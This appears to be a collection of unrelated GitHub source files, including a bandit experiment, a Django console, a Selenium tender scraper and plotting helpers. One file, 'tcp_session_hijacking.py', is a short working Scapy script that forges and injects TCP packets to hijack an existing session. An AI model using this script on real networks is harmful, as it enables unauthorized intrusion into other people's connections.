char.contracts().result\n \n for contract_id, contract_info in contracts_result.items():\n self.log.info(\"Contract {!s}: {}\".format(contract_id, contract_info))\n if contract_id in saved_contracts:\n prev_contract_info = saved_contracts[contract_id]\n if prev_contract_info['status'] != contract_info['status']:\n self.log.info(\"Contract {0!s} changed state from {} to {}\".format(contract_id, prev_contract_info['status'], contract_info['status']))\n saved_contracts[contract_id] = contracts_info\n self[\"CONTRACTS\"] = saved_contracts\n elif contract_info['status'] == 'Outstanding':\n self.log.info(\"New contract {!s} discovered.\".format(contract_id))\n saved_contracts[contract_id] = contract_info\n self[\"CONTRACTS\"] = saved_contracts\n","repo_name":"ministry-of-love/contractor","sub_path":"contractor.py","file_name":"contractor.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74069427985","text":"import numpy as np\nclass LogSeries:\n def __init__(self, a0):\n self.a0 = a0\n\n def __call__(self, t):\n assert(t > 0)\n return self.a0 + np.log(t)\n\nif __name__ == \"__main__\":\n a0 = 0.1\n a = LogSeries(a0)\n print(a(1))\n print(a(2))\n print(a(3))\n print(a(100))\n print(a(1000))\n","repo_name":"omron-sinicx/action-constrained-RL-benchmark","sub_path":"action_constrained_rl/utils/log_series.py","file_name":"log_series.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"2199331793","text":"import webbrowser\n\nimport pygame\n\n\"\"\"Main setup\"\"\"\nFPS = 60\nwindow_title = 'Polo'\nscreen_resolution = (800, 600)\nscreen_mode = pygame.FULLSCREEN\nlevel_path = r\"/Levels/\"\n\n\"\"\"Fonts and Language\"\"\"\nlanguage = 0\npygame.font.init()\nsize = 16\nmessage_line_length = 70\nfont_location = \"Source/Fonts/\"\norson_location = font_location + \"SFOrson/\"\nsilver_location = font_location + \"SilverAge/\"\nghost_location = font_location + \"Ghost/\"\nfont_medium = pygame.font.Font(orson_location + \"SFOrsonCasualMedium.ttf\", size)\nfont_heavy = pygame.font.Font(orson_location + \"SFOrsonCasualHeavy.ttf\", int(1.5 * size))\nfont_shaded = pygame.font.Font(orson_location + \"SFOrsonCasualShaded.ttf\", 2 * size)\nfont_message_text = pygame.font.Font(ghost_location + \"T-FLEXTypeB.ttf\", int(1.6 * size))\n\n\"\"\"User\"\"\"\nuser_config_file = \"cfg\"\n\n\ndef about():\n out_about = \"Polo \\n\" \\\n \"Created by Zhufyak V.V. 
\\n\" \\\n \"Music by Baglay R. I.\" \\\n \"Special thanks: \\n\" \\\n \"Baglay Roman \\n\" \\\n \"Kappa\"\n git_link = \"https://github.com/zhufyakvv/Polo\"\n print(out_about)\n webbrowser.open(url=git_link)\n","repo_name":"vzhufk/Polo","sub_path":"variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1780208133","text":"from scapy.all import *\n\nprint(\"-\"*50)\nprint(\"-\"*10,\"TCP Session Hijacking Attack\",\"-\"*10)\nprint(\"-\"*50)\n\nsrc_ip = input('Source IP Address: ')\ndst_ip = input('Destination IP Address: ')\nsrc_port = int(input('Source Port: '))\ndst_port = int(input('Destination Port: '))\nseq_num = int(input('Sequence Number (raw): '))\nack_num = int(input('Acknowledgment number (raw): '))\ndata = input('Message: ')\n\nprint(\"Sending Session Hijacking Packet.......\")\n\nIPLayer = IP(src=src_ip,dst=dst_ip)\nTCPLayer = TCP(sport=src_port, dport=dst_port, flags=0x018,seq=seq_num, ack=ack_num)\npkt = IPLayer/TCPLayer/str(data)\nsend(pkt,verbose=0)\n","repo_name":"ahictf/TCP-Session-Hijacking-Attack","sub_path":"tcp_session_hijacking.py","file_name":"tcp_session_hijacking.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5306790119","text":"from itertools import permutations\r\ni=input().split()\r\ns=i[0]\r\nintt=int(i[1])\r\nli1=list(permutations(s,intt))\r\nli=sorted(li1)\r\nfor x in li:\r\n for y in x:\r\n print(y,end=\"\")\r\n print(sep=\" \")\r\n\r\n","repo_name":"Dineshanth123/hackkerrank","sub_path":"itertools permutations.py","file_name":"itertools permutations.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73991309264","text":"#Problem:\n#1. Create Bandit with different wining rate\n#2. 
Experiment code to explore and exploit\n\n#EpsilonGreedy :\n# Gerenate random number x from 0-1\n# if x is less the epsilon:\n# select a random bandit (index = random....)\n# else:\n# select the Bandit with maximun reward index = max(bandit)\n# exploit the bandit[index]\n# update the reward rate of bandit[index]\n\n\nimport random\n\nwiningRate = [0.2 , 0.3 , 0.5, 0.8];\nnumberOfTrail = 1000;\n\nclass Bandit:\n def __init__(this,winingRate):\n this.winingRate = winingRate;\n this.numberOfBandit = len(winingRate)\n\n def pull(this,i):\n x = random.random()\n if x <= this.winingRate[i]:\n return 1\n else:\n return 0\n\nbandit = Bandit(winingRate)\nreward = 0\n\nsampleRate = [0]*bandit.numberOfBandit\nnoOfSample = [0]*bandit.numberOfBandit\nepsilon = 0.1\n\ndef calSampleMean(i, sample):\n n = noOfSample[i]\n prevMean = sampleRate[i]\n newMean = (prevMean * n + sample)/(n+1)\n return newMean\n\n\n\n\nfor i in range(numberOfTrail):\n x=random.random()\n if x 1:\n if list_args[0] not in list_class:\n print(\"** class doesn't exist **\")\n return\n\n show = re.match(\"show(.*)\", list_args[1])\n destroy = re.match(\"destroy(.*)\", list_args[1])\n update = re.match(\"update(.*)\", list_args[1])\n objects = models.storage.all()\n\n if list_args[1] == \"all()\": # 11..all()\n self.do_all(list_args[0])\n elif list_args[1] == \"count()\": # 11..count()\n count = 0\n for key, value in objects.items():\n if value.to_dict()[\"__class__\"] == list_args[0]:\n count += 1\n print(count)\n elif show and len(list_args[1]) == show.end(): # 12..show(id)\n id_obj = list_args[1][6: -2]\n key = list_args[0] + \".\" + id_obj\n\n if key in objects:\n print(objects[key])\n else:\n print(\"** no instance found **\")\n elif destroy and len(list_args[1]) == destroy.end(): # 13..de\n id_obj = list_args[1][9: -2]\n key = list_args[0] + \".\" + id_obj\n\n if key in objects:\n args = list_args[0] + \" \" + id_obj\n self.do_destroy(args)\n else:\n print(\"** no instance found **\")\n elif update and len(list_args[1]) == update.end(): # 14..up\n args_init = list_args[1][7: -1]\n args_check_update_dict = re.match('\".*\", {.*}', args_init)\n if not args_check_update_dict: # 14..up\n args_not_comma = args_init.replace(\",\", \"\")\n args = list_args[0] + \" \" + args_not_comma\n self.do_update(args)\n else:\n list_args_for_dict = args_init.split(\",\")\n key = list_args[0] + \".\" + list_args_for_dict[0][1: -1]\n if key in objects:\n mydict_incomplete = args_init.split(\"{\")\n mydict_final = \"{\" + mydict_incomplete[1]\n dict_atributtes = eval(mydict_final)\n dict_atributtes.update(objects[key].to_dict())\n new_obj = eval(list_args[0])(**dict_atributtes)\n objects[key] = new_obj\n models.storage.save()\n else:\n print(\"** no instance found **\")\n\n def do_quit(self, args):\n 'Quit command to exit the program\\n'\n return True\n\n def do_EOF(self, line):\n 'EOF command (ctrl + d) to exit the program\\n'\n return True\n\n def do_create(self, args):\n \"\"\"Creates a new instance of BaseModel, saves it (to the JSON file)\n and prints the id\n \"\"\"\n args_list = args.split()\n\n if len(args_list) == 0:\n print(\"** class name missing **\")\n else:\n try:\n new_object = eval(args_list[0])()\n new_object.save()\n print(new_object.id)\n except:\n print(\"** class doesn't exist **\")\n\n def do_show(self, args):\n \"\"\"Prints the string representation of an instance based on the class\n name and id\n \"\"\"\n args_list = args.split()\n list_class = [\"BaseModel\", \"Amenity\", \"Place\", \"User\", \"City\",\n \"Review\", 
\"State\"]\n\n if len(args_list) == 0:\n print(\"** class name missing **\")\n elif len(args_list) == 1:\n if args_list[0] not in list_class:\n print(\"** class doesn't exist **\")\n else:\n if len(args_list) == 1:\n print(\"** instance id missing **\")\n else:\n if args_list[0] not in list_class:\n print(\"** class doesn't exist **\")\n else:\n id_to_check = args_list[0] + \".\" + args_list[1]\n all_objects = models.storage.all()\n\n if id_to_check not in all_objects:\n print(\"** no instance found **\")\n else:\n print(all_objects[id_to_check])\n\n def do_destroy(self, args):\n \"\"\" Deletes an instance based on the class name and id (save the change\n into the JSON file).\n \"\"\"\n args_list = args.split()\n list_class = [\"BaseModel\", \"Amenity\", \"Place\", \"User\", \"City\",\n \"Review\", \"State\"]\n\n if len(args_list) == 0:\n print(\"** class name missing **\")\n elif len(args_list) == 1:\n if args_list[0] not in list_class:\n print(\"** class doesn't exist **\")\n else:\n if len(args_list) == 1:\n print(\"** instance id missing **\")\n else:\n if args_list[0] not in list_class:\n print(\"** class doesn't exist **\")\n else:\n id_to_check = args_list[0] + \".\" + args_list[1]\n all_objects = models.storage.all()\n\n if id_to_check not in all_objects:\n print(\"** no instance found **\")\n else:\n del all_objects[id_to_check]\n models.storage.save()\n\n def do_all(self, args):\n \"\"\" Prints all string representation of all instances based or not on\n the class name.\n \"\"\"\n args_list = args.split()\n list_class = [\"BaseModel\", \"Amenity\", \"Place\", \"User\", \"City\",\n \"Review\", \"State\"]\n all_objects = models.storage.all()\n list_of_print = []\n\n if len(args_list) == 0:\n for key, value in all_objects.items():\n list_of_print.append(value.__str__())\n print(list_of_print)\n else:\n if args_list[0] not in list_class:\n print(\"** class doesn't exist **\")\n else:\n for key, value in all_objects.items():\n if value.to_dict()[\"__class__\"] == args_list[0]:\n list_of_print.append(value.__str__())\n print(list_of_print)\n\n def do_update(self, args):\n \"\"\"Updates an instance based on the class name and id by adding or\n updating attribute (save the change into the JSON file).\n \"\"\"\n\n args_list = shlex.split(args)\n list_class = [\"BaseModel\", \"Amenity\", \"Place\", \"User\", \"City\",\n \"Review\", \"State\"]\n if len(args_list) == 0: # $Update\n print(\"** class name missing **\")\n elif len(args_list) == 1: # 1.\n if args_list[0] not in list_class: # $Update MyModel\n print(\"** class doesn't exist **\")\n else: # $ update BaseModel\n print(\"** instance id missing **\")\n elif len(args_list) == 2: # 2.\n if args_list[0] not in list_class: # $Update MyModel\n print(\"** class doesn't exist **\")\n else:\n id_to_check = args_list[0] + \".\" + args_list[1]\n all_objects = models.storage.all()\n\n if id_to_check not in all_objects: # $update BaseModel 121\n print(\"** no instance found **\")\n else: # $ update BaseModel existing-id\n print(\"** attribute name missing **\")\n elif len(args_list) == 3: # 3.\n if args_list[0] not in list_class: # $Update MyModel\n print(\"** class doesn't exist **\")\n else:\n id_to_check = args_list[0] + \".\" + args_list[1]\n all_objects = models.storage.all()\n\n if id_to_check not in all_objects: # $update BaseModel 121212\n print(\"** no instance found **\")\n else: # $ update BaseModel existing-id\n print(\"** value missing **\") # $ update BaseModel id\n else: # 4.\"\"\n if args_list[0] not in list_class: # $Update 
MyModel\n print(\"** class doesn't exist **\")\n else:\n id_to_check = args_list[0] + \".\" + args_list[1]\n all_objects = models.storage.all()\n\n if id_to_check not in all_objects: # $update BaseModel 121212\n print(\"** no instance found **\")\n else: # $ update BaseModel existing-id\n value_temp = args_list[3]\n\n try:\n if \".\" in value_temp: # chrek if is posible float\n value = float(value_temp)\n else:\n value = int(value_temp) # check if is posible int\n except:\n value = value_temp # assign value how string\n\n setattr(all_objects[id_to_check], args_list[2], value)\n models.storage.save()\n\nif __name__ == \"__main__\":\n mycmd = HBNBCommand()\n mycmd.cmdloop()\n","repo_name":"Diegokernel/AirBnB_clone","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":10053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1252637259","text":"import sys\r\nimport time\r\nimport datetime\r\nimport os\r\n\r\n# Google Tasks API\r\nfrom google.cloud import tasks_v2\r\nfrom google.protobuf import timestamp_pb2\r\nimport json\r\nimport base64\r\n\r\n# Import the Secret Manager client library.\r\nfrom google.cloud import secretmanager\r\n\r\n# Selenium essentials\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.ui import WebDriverWait as wait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\n\r\n# Imports the Cloud Logging client library\r\nimport google.cloud.logging\r\n# Imports Python standard library logging\r\nimport logging\r\n\r\nimport chromedriver_binary # Adds chromedriver binary to path\r\nfrom lxml import html\r\nfrom sqlalchemy import Table, Column, Integer, String, MetaData, Text, Boolean, DateTime, ForeignKey, BigInteger, \\\r\n create_engine, insert # Python SQL toolkit essentials\r\n\r\n# Instantiates a client for logging\r\nclient = google.cloud.logging.Client()\r\n\r\n# Retrieves a Cloud Logging handler based on the environment\r\n# you're running in and integrates the handler with the\r\n# Python logging module. 
By default this captures all logs\r\n# at INFO level and higher\r\nclient.get_default_handler()\r\nclient.setup_logging()\r\n\r\n# Create a client for tasks API.\r\nclient = tasks_v2.CloudTasksClient()\r\n\r\n# Tasks API Configuration\r\nproject = 'tenders-284621'\r\nqueue = 'scraping-queue'\r\nlocation = 'europe-west1'\r\nBASEURL = os.environ[\"BASEURL\"]\r\npayload = None\r\ntask_name = None\r\n\r\n\r\n# client-cert, client-key, server-ca\r\ndef create_pem(pem_type, pem_content):\r\n with open(pem_type+\".pem\", \"w+\", encoding='utf8', newline='\\n') as fh:\r\n fh.write(pem_content[:pem_content.find('-----', 1)+5]+'\\n')\r\n \r\n value = pem_content[pem_content.find('-----', 1)+5:pem_content.rfind('-----END')]\r\n for i in range(0, len(value) // 64):\r\n fh.write(value[64*i:64*(i+1)]+'\\n')\r\n if (len(value) % 64 != 0):\r\n fh.write(value[64*(len(value)//64)::]+'\\n') \r\n \r\n fh.write(pem_content[pem_content.rfind('-----END'):])\r\n\r\n os.chmod(pem_type+\".pem\", 0o600)\r\n fh.close()\r\n\r\n\r\n# Create the Secret Manager client.\r\nsecrets_client = secretmanager.SecretManagerServiceClient()\r\n\r\n# Access the secret version.\r\nclient_cert = secrets_client.access_secret_version(request={\"name\": \"projects/\"+project+\"/secrets/db-client-cert/versions/1\"}).payload.data.decode(\"utf-8\")\r\nclient_key = secrets_client.access_secret_version(request={\"name\": \"projects/\"+project+\"/secrets/db-client-key/versions/1\"}).payload.data.decode(\"utf-8\")\r\nserver_ca = secrets_client.access_secret_version(request={\"name\": \"projects/\"+project+\"/secrets/db-server-ca/versions/1\"}).payload.data.decode(\"utf-8\")\r\n\r\n\r\ncreate_pem('client-cert', base64.b64decode(client_cert).decode(\"utf-8\"))\r\ncreate_pem('client-key', base64.b64decode(client_key).decode(\"utf-8\"))\r\ncreate_pem('server-ca', base64.b64decode(server_ca).decode(\"utf-8\"))\r\n\r\n\r\n\r\n# Google Cloud SSL Configuration\r\nssl_args = {'sslrootcert':'server-ca.pem',\r\n 'sslcert':'client-cert.pem',\r\n 'sslkey':'client-key.pem'}\r\n\r\n# Construct the fully qualified queue name.\r\nparent = client.queue_path(project, location, queue)\r\n\r\n# Link containing all tenders\r\nMAINLINK = \"https://www.swz.kghm.pl/servlet/HomeServlet?MP_module=main&MP_action=noticeList&demandType=nonpublic\"\r\n# Postgresql connection strings\r\nDATABASE_HOST = os.environ[\"DATABASE_HOST\"]\r\nDATABASE_CREDENTIALS = secrets_client.access_secret_version(request={\"name\": \"projects/\"+project+\"/secrets/credentials/versions/1\"}).payload.data.decode(\"utf-8\")\r\n\r\ntime_in_between = 15\r\n\r\n# Set log file and log level (INFO/DEBUG)\r\nlogging.info(\"=================================================================================\")\r\nlogging.info(\"Scraping all tenders started\")\r\n\r\n# The following options are required to make headless Chrome work in a Docker container\r\nchrome_options = webdriver.ChromeOptions()\r\nchrome_options.add_argument(\"--headless\")\r\nchrome_options.add_argument(\"--disable-gpu\")\r\nchrome_options.add_argument(\"window-size=1024,768\")\r\nchrome_options.add_argument(\"--no-sandbox\")\r\n\r\n# Initialize a new browser\r\ntry:\r\n browser = webdriver.Chrome(\r\n options=chrome_options)\r\nexcept Exception as e:\r\n logging.fatal(\"Browser didn't start - {}\".format(str(e)))\r\n sys.exit(1)\r\n\r\nlogging.info(\"Browser started\")\r\n\r\n# Connect to database\r\nDATABASE_URI = \"postgresql://\" + DATABASE_CREDENTIALS + \"@\" + DATABASE_HOST\r\ntry:\r\n engine = create_engine(DATABASE_URI, 
connect_args=ssl_args)\r\n connection = engine.connect()\r\nexcept Exception as e:\r\n logging.fatal(\"Can't connect to Postgresql - {}\".format(str(e)))\r\n browser.quit()\r\n sys.exit(1)\r\n\r\n# Retrieve notices table\r\nmetadata = MetaData(schema=\"tenders\")\r\nnotices_table = Table('notices', metadata, autoload=True, autoload_with=engine)\r\n\r\n# Access link and scrape notices general information\r\nbrowser.get(MAINLINK)\r\ntime.sleep(2)\r\n\r\nlogging.info(\"Site opened\")\r\nelem = wait(browser, 5).until(EC.presence_of_element_located((By.XPATH,\r\n '//select[contains(@name, \"GD_pagesize\")]')))\r\nelem.click()\r\nelem = wait(browser, 5).until(EC.presence_of_element_located((By.XPATH,\r\n '//select[contains(@name, \"GD_pagesize\")]/option[@value=\"100\"]')))\r\nelem.click()\r\ntime.sleep(2)\r\ntree = html.fromstring(browser.page_source)\r\ncount_check = tree.xpath(\r\n 'string(count(//table[contains(@class, \"bodybox\")]//tr[@onmouseover]//img[@src=\"/pic/mp/details.gif\"]/../@href))')\r\n\r\nlogging.info('Number of tenders: {}'.format(count_check))\r\n# Will contain all new notices\r\nnotices = []\r\nin_seconds = time_in_between\r\nfor attr in tree.xpath('//table[contains(@class, \"bodybox\")]//tr[@onmouseover]'):\r\n url = attr.xpath('string(.//img[@src=\"/pic/mp/details.gif\"]/../@href)')\r\n if url:\r\n id_ = url.split(\"iRfxRound=\")[-1]\r\n\r\n date_published_string = attr.xpath(\r\n 'normalize-space(string(.//td[4]))')\r\n\r\n query = notices_table.select().where(notices_table.c.id == id_)\r\n result = connection.execute(query)\r\n\r\n length = 0\r\n for row in result:\r\n length += 1\r\n\r\n date_published = date_published_string[:16]\r\n date_published = time.mktime(datetime.datetime.strptime(date_published, \"%Y-%m-%d %H:%M\").timetuple())\r\n\r\n # Notice never scraped\r\n if (length == 0): \r\n # Construct the request body.\r\n url = BASEURL +str(id_)+'/'+str(date_published)[:-2] \r\n task = {\r\n 'http_request': { # Specify the type of request.\r\n 'http_method': 'GET',\r\n 'url': url # The full url path that the task will be sent to.\r\n }\r\n }\r\n\r\n # Create task to run in cloud\r\n if payload is not None:\r\n if isinstance(payload, dict):\r\n # Convert dict to JSON string\r\n payload = json.dumps(payload)\r\n # specify http content-type to application/json\r\n task['http_request']['headers'] = {'Content-type': 'application/json'}\r\n\r\n # The API expects a payload of type bytes.\r\n converted_payload = payload.encode()\r\n\r\n # Add the payload to the request.\r\n task['http_request']['body'] = converted_payload\r\n\r\n if in_seconds is not None:\r\n # Convert \"seconds from now\" into an rfc3339 datetime string.\r\n d = datetime.datetime.utcnow() + datetime.timedelta(seconds=in_seconds)\r\n\r\n # Create Timestamp protobuf.\r\n timestamp = timestamp_pb2.Timestamp()\r\n timestamp.FromDatetime(d)\r\n\r\n # Add the timestamp to the tasks.\r\n task['schedule_time'] = timestamp\r\n\r\n if task_name is not None:\r\n # Add the name to tasks.\r\n task['name'] = task_name\r\n\r\n # Use the client to build and send the task.\r\n response = client.create_task(parent, task)\r\n logging.info('Created task {} for tender #{} at {}'.format(response.name, id_, url))\r\n\r\n # Increment in_seconds to seperate workload\r\n in_seconds += time_in_between\r\n\r\n # py scrape_id.py notice date_published\r\n notices.append({\r\n \"tender_id\": id_,\r\n \"date_published\": str(date_published)[:-2]\r\n })\r\n\r\nbrowser.quit()\r\nfor notice in notices:\r\n 
logging.info(notice)\r\nlogging.info(\"Script completed with {} new notices.\".format(len(notices)))\r\nlogging.info(\"=================================================================================\")\r\n","repo_name":"wassimbouzazi/Tenders-Scraper","sub_path":"scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":8848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28779587556","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template import loader\n\ndef exercise1(request):\n return HttpResponse(\"

Hello! This is the first Django web page made by 최서영.

\")\n# Create your views here.\n\ndef exercise2(request):\n if request.method == 'POST':\n na = request.POST['name']\n opi = request.POST['opinion']\n context = {'na' : na, 'opi' : opi}\n else:\n context = None\n return render(request, 'exercise2.html', context)\n\ndef product1(request):\n template = loader.get_template('product1.html')\n context = {'pid' : ['p001','p002','p003','p004','p005','p006','p007','p008','p009','p010']}\n return HttpResponse(template.render(context, request))\n\ndef basket1(request, pid):\n context = {\n 'pid': pid,\n }\n return render(request, 'basket1.html', context)","repo_name":"cseoy73/ExerciseProject-Web","sub_path":"workapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22032115226","text":"import numpy as np\n\ndummy = 1.0\n\ndef compute_a():\n a = dummy**2 \n return a\n\ndef compute_b(dummy1):\n a = dummy1**2\n return a\n\ndef check(dummy):\n dummy = 3.0\n print( 'value a =',compute_a(), 'value b =', compute_b(dummy))\nt = 0\nwhile t <10:\n \n dummy = 2.0\n check(dummy)\n \n t +=1\n\n\n","repo_name":"skkmaths/claw","sub_path":"1dscalar/bug.py","file_name":"bug.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33338577964","text":"# coding: utf-8\nfrom os import path\nfrom PIL import Image\nimport numpy as np\nfrom wordcloud import WordCloud, STOPWORDS\nfrom Python3.DataAnalysis import *\n\n\nclass Cloud:\n\n def __init__(self):\n '''\n - 通过self.site控制分析方向,选择文件夹\n - 生成DataAnalysis实例,借用jieba分词部分代码\n - 加载文本字符串和底片\n '''\n self.site = 'up'\n self.d = path.dirname(__file__)\n self.text_ = open(path.join(self.d,'Data/'+self.site+'/txt.txt')).read()\n\n da = DataAnalysis()\n da.Initialization()\n\n self.text = ','.join(str(i) for i in da.process(self.text_,da.stopwordTxt))\n self._mask = np.array(Image.open(path.join(self.d,\"Settings/bit_mask.png\")))\n\n def getCloud(self):\n '''\n - 生成WordCloud对象,设置背景色,云词数量,底片,及中文字体\n - 使用WordCloud处理文本\n - 输出图像\n - 运行时显示结果图片\n - 运行时显示底片\n\n :return:\n '''\n\n wc = WordCloud(background_color=\"white\", max_words=100, mask=self._mask,font_path=\"Settings/simsun.ttf\")\n wc.generate(self.text)\n wc.to_file(path.join(self.d, \"picture/bit.png\"))\n\n plt.imshow(wc, interpolation='bilinear')\n plt.axis(\"off\")\n plt.figure()\n plt.imshow(self._mask, cmap=plt.cm.gray, interpolation='bilinear')\n plt.axis(\"off\")\n plt.show()\n\ncl = Cloud()\ncl.getCloud()","repo_name":"orekiku/WeiBoDataMining","sub_path":"Cloud.py","file_name":"Cloud.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30542401044","text":"file = open(\"./input.txt\", \"r\")\nall = []\ntwos_count = 0\nthrees_count = 0\nfor str in file:\n all.append(str.strip())\n char_counts = {}\n for char in str.strip():\n count = char_counts.get(char, 0)\n char_counts[char] = count + 1\n\n has_two = False\n has_three = False\n for x,y in char_counts.items():\n if y == 3:\n has_three = True\n if y == 2:\n has_two = True\n if has_two:\n twos_count += 1\n if has_three:\n threes_count += 1\n #print(list(filter(lambda x: x == 3, char_counts.items())))\nprint(\"Part 1:\", twos_count * threes_count)\n\nscores = {}\nfor index, word in enumerate(all):\n for index2, word2 in enumerate(all):\n # if index == index2:\n # continue\n score = 0\n for i in 
range(0, len(word)):\n if word[i] != word2[i]:\n score += 1\n a = scores.get(score, None)\n if a == None:\n a = { 'words': [] }\n a['words'].append(word)\n a['words'].append(word2)\n scores[score] = a\nprint(set(scores[1]['words']))\n# part 2 answer: zihwtxagifpbsnwleydukjmqv\n","repo_name":"rashkov/aoc18","sub_path":"2/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73562458707","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport os.path\n\nfrom django.db import models, migrations\n\n\ndef set_filenames(apps, schema_editor):\n # We can't import the ProgramFile model directly as it may be a newer\n # version than this migration expects. We use the historical version.\n ProgramFile = apps.get_model(\"microstructure\", \"ProgramFile\")\n for pfile in ProgramFile.objects.all():\n pfile.filename = os.path.basename(pfile.file.name)\n pfile.save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('microstructure', '0002_auto_20140903_1959'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='programfile',\n name='filename',\n field=models.CharField(default='', max_length=512),\n preserve_default=False,\n ),\n migrations.RunPython(set_filenames),\n ]\n","repo_name":"cchdo/ustructure","sub_path":"microstructure/migrations/0003_programfile_filename.py","file_name":"0003_programfile_filename.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73656732306","text":"from optparse import Values\nimport matplotlib.pyplot as plt\nfrom floodsystem.analysis import polyfit\nimport matplotlib\nimport numpy as np\nfrom datetime import datetime, timedelta\nfrom floodsystem.datafetcher import fetch_measure_levels\ndef plot_water_levels(station, dates, levels):\n \"plots time series of level data\"\n \n \n\n \n\n # Plots available level data\n \n plt.plot(dates, levels)\n # checks if historic level data is available\n if not levels:\n # if not, ignores and prints a warning\n print(\"Past Level Data Unavailable\")\n else:\n # if available, plots lines of maximum/minimum levels\n plt.plot(dates, [station.typical_range[0]]*len(dates))\n plt.plot(dates, [station.typical_range[1]]*len(dates))\n \n # set up plot nicely\n plt.xlabel('date')\n plt.ylabel('water level (m)')\n plt.xticks(rotation=45);\n plt.title(station.name)\n plt.tight_layout() \n # plot\n plt.show()\n\n\ndef plot_water_level_with_fit(station, dates, levels, p):\n x = matplotlib.dates.date2num(dates)\n y = levels\n plt.plot(x, y, '.')\n if dates:\n poly, d0 = polyfit(dates, levels, p)\n x1 = np.linspace(d0, x[-1], 30)\n plt.plot(x1, poly(x1 - d0))\n plt.plot(dates, [max(levels)]*len(dates))\n plt.plot(dates, [min(levels)]*len(dates))\n plt.xlabel('date')\n plt.ylabel('water level (m)')\n plt.xticks(rotation=45);\n plt.title(station.name)\n plt.tight_layout() \n plt.show()\n else:\n return None\n","repo_name":"ParthVader02/Flood-System-142","sub_path":"floodsystem/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72631575827","text":"\"\"\"empty message\n\nRevision ID: fa7b0f719596\nRevises: 83ce577adf07\nCreate Date: 2023-08-23 17:27:37.392844\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by 
Alembic.\nrevision = 'fa7b0f719596'\ndown_revision = '83ce577adf07'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('data_pelanggaran', schema=None) as batch_op:\n batch_op.drop_constraint('data_pelanggaran_ibfk_4', type_='foreignkey')\n batch_op.create_foreign_key(None, 'detail_guru', ['guru_id'], ['id'])\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('data_pelanggaran', schema=None) as batch_op:\n batch_op.drop_constraint(None, type_='foreignkey')\n batch_op.create_foreign_key('data_pelanggaran_ibfk_4', 'detail_guru', ['guru_id'], ['id'], onupdate='CASCADE', ondelete='CASCADE')\n\n # ### end Alembic commands ###\n","repo_name":"ariefendi992/sistem-monitoring","sub_path":"migrations/versions/fa7b0f719596_.py","file_name":"fa7b0f719596_.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"10244008132","text":"def checkBanana(amnt_banana,amnt,b_count):\r\n if(amnt <1000 and amnt_banana <1000 and b_count <1000):\r\n b_cost=0\r\n for i in range(1,b_count+1):\r\n b_cost=b_cost+i*amnt_banana\r\n print(b_cost)\r\n if(b_cost len(pikim):\n pikim = lemma\nprint(pikim)\n ","repo_name":"NFilin10/TU_programming_course","sub_path":"praksid/praks_5/pikim.py","file_name":"pikim.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72238346386","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path(\"\", views.SongsView.as_view()),\n path(\"artists/\", views.ArtistsView.as_view()),\n path(\"filter/\", views.FilterSongsView.as_view(),name = 'filter'),\n path(\"/\", views.ArtistDetailView.as_view(), name='artist_details'),\n path(\"/\", views.SongDetailView.as_view(), name='song_details'),\n\n]","repo_name":"YernurShamshadin/dj1project","sub_path":"kz_musics/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"75163371984","text":"import streamlit as st\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport geopandas as gpd \r\n\r\nfrom pyproj import CRS \r\n#import xyzservices.providers as xyz \r\n\r\nfrom bokeh.models import ColumnDataSource\r\nfrom 